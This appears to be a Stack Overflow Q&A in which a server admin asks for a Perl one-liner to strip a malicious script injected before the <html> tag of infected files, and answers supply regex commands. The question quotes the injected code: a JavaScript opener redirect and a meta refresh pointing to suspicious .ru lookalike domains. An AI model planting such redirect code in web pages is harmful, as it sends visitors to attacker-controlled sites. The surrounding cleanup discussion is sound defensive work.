
How can I replace everything before the <html> tag with a Perl command?

A folder on a web server I manage was recently infected, and a malicious script was inserted before the opening <html> tag in a whole mess of files. I'm trying to run a Perl string-replace command to clean it out.

The infected files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use Perl's string replace. The biggest issue I'm running into is making it work across multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html    

This seems to have no effect. If I change the second <html> to <foobar>, it correctly replaces the tag with <foobar>, but it leaves everything in front of it untouched.

From what I can tell, the -0777 flag is supposed to "slurp" the whole file as one string, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this safer and more efficient pattern, which stops at the first <html> instead of backtracking from the end of the file:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

\s* is too specific: it only matches whitespace before the <html> tag, and you want to match more than that. Try .* instead, which (with the /s modifier your command already uses) matches everything before the <html> tag.

\s* should be [\s\S]* so that it matches all characters, including newlines.

I found this to be a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html
